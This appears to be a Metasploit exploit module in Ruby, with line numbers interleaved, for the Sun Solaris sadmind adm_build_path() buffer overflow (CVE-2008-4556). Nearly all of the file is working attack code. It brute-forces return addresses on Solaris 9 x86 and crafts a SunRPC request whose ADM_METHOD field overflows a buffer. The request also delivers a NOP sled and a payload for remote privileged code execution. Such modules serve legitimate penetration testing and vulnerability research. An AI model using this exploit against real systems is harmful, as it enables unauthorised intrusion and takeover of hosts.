1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SunRPC
10
  include Msf::Exploit::Brute
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Sun Solaris sadmind adm_build_path() Buffer Overflow',
17
        'Description' => %q{
18
          This module exploits a buffer overflow vulnerability in adm_build_path()
19
          function of Sun Solstice AdminSuite sadmind daemon.
20

21
          The distributed system administration daemon (sadmind) is the daemon used by
22
          Solstice AdminSuite applications to perform distributed system administration
23
          operations.
24

25
          The sadmind daemon is started automatically by the inetd daemon whenever a
26
          request to invoke an operation is received. The sadmind daemon process
27
          continues to run for 15 minutes after the last request is completed, unless a
28
          different idle-time is specified with the -i command line option. The sadmind
29
          daemon may be started independently from the command line, for example, at
30
          system boot time. In this case, the -i option has no effect; sadmind continues
31
          to run, even if there are no active requests.
32
        },
33
        'Author' => [
34
          'Ramon de C Valle',
35
          'Adriano Lima <adriano[at]risesecurity.org>',
36
        ],
37
        'Platform' => 'solaris',
38
        'References' => [
39
          ['CVE', '2008-4556'],
40
          ['OSVDB', '49111'],
41
          ['URL', 'https://web.archive.org/web/20081201000000*/https://risesecurity.org/advisories/RISE-2008001.txt'],
42
        ],
43
        'Privileged' => true,
44
        'License' => MSF_LICENSE,
45
        'Payload' => {
46
          'Space' => 1024,
47
          'BadChars' => "\x00"
48
        },
49
        'Targets' => [
50
          [
51
            'Sun Solaris 9 x86 Brute Force',
52
            {
53
              'Arch' => [ ARCH_X86 ],
54
              'Platform' => 'solaris',
55
              'Nops' => 1024 * 32,
56
              'Bruteforce' =>
57
                {
58
                  'Start' => { 'Ret' => 0x08062030 },
59
                  'Stop' => { 'Ret' => 0x08072030 },
60
                  'Step' => 1024 * 30
61
                }
62
            }
63
          ],
64
          [
65
            'Sun Solaris 9 x86',
66
            {
67
              'Nops' => 1024 * 4,
68
              'Bruteforce' =>
69
                {
70
                  'Start' => { 'Ret' => 0x08066a60 + 2048 },
71
                  'Stop' => { 'Ret' => 0x08066a60 + 2048 },
72
                  'Step' => 1
73
                }
74
            }
75
          ],
76
          [
77
            'Debug',
78
            {
79
              'Nops' => 1024 * 4,
80
              'Bruteforce' =>
81
                {
82
                  'Start' => { 'Ret' => 0xaabbccdd },
83
                  'Stop' => { 'Ret' => 0xaabbccdd },
84
                  'Step' => 1
85
                }
86
            }
87
          ],
88
        ],
89
        'DefaultTarget' => 0,
90
        'DisclosureDate' => '2008-10-14',
91
        'Notes' => {
92
          'Stability' => [CRASH_SERVICE_RESTARTS],
93
          'Reliability' => [REPEATABLE_SESSION],
94
          'SideEffects' => [IOC_IN_LOGS]
95
        }
96
      )
97
    )
98
  end
99

100
  def check
101
    port = sunrpc_create('udp', 100232, 10)
102
    port.nil? ? CheckCode::Safe : CheckCode::Detected
103
  ensure
104
    sunrpc_destroy unless rpcobj.nil?
105
  end
106

107
  def brute_exploit(brute_target)
108
    begin
109
      sunrpc_create('udp', 100232, 10)
110
    rescue Rex::Proto::SunRPC::RPCTimeout, Rex::Proto::SunRPC::RPCError => e
111
      vprint_error(e.to_s)
112
      return
113
    end
114

115
    unless @nops
116
      print_status('Creating nop block...')
117
      if target['Nops'] > 0
118
        @nops = make_nops(target['Nops'])
119
      else
120
        @nops = ''
121
      end
122
    end
123

124
    print_status('Trying to exploit sadmind with address 0x%.8x...' % brute_target['Ret'])
125

126
    hostname = 'localhost'
127

128
    # buf1 = rand_text_alpha(1017) + [brute_target['Ret']].pack('L')
129
    buf1 = 'A' * 1017 + [brute_target['Ret']].pack('L')
130
    buf2 = @nops + payload.encoded
131

132
    header = Rex::Encoder::XDR.encode(0) * 7
133
    header << Rex::Encoder::XDR.encode(
134
      6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
135
      4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
136
      hostname, 'system', rand_text_alpha(16)
137
    )
138

139
    body =
140
      do_int('ADM_FW_VERSION', 1) +
141
      do_string('ADM_LANG', 'C') +
142
      do_string('ADM_REQUESTID', '00009:000000000:0') +
143
      do_string('ADM_CLASS', 'system') +
144
      do_string('ADM_CLASS_VERS', '2.1') +
145
      do_string('ADM_METHOD', buf1) +
146
      do_string('ADM_HOST', hostname) +
147
      do_string('ADM_CLIENT_HOST', hostname) +
148
      do_string('ADM_CLIENT_DOMAIN', '') +
149
      do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
150
      do_int('ADM_FENCE', 0) +
151
      do_string('X', buf2) +
152
      Rex::Encoder::XDR.encode('netmgt_endofargs')
153

154
    request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
155

156
    begin
157
      # two seconds timeout for brute force
158
      sunrpc_call(1, request, 2)
159
    rescue Rex::Proto::SunRPC::RPCTimeout
160
      print_status('Server did not respond, this is expected')
161
    rescue Rex::Proto::SunRPC::RPCError => e
162
      print_error(e.to_s)
163
    end
164
  ensure
165
    sunrpc_destroy unless rpcobj.nil?
166
  end
167

168
  def do_string(str1, str2)
169
    Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
170
  end
171

172
  def do_int(str, int)
173
    Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
174
  end
175
end
176

177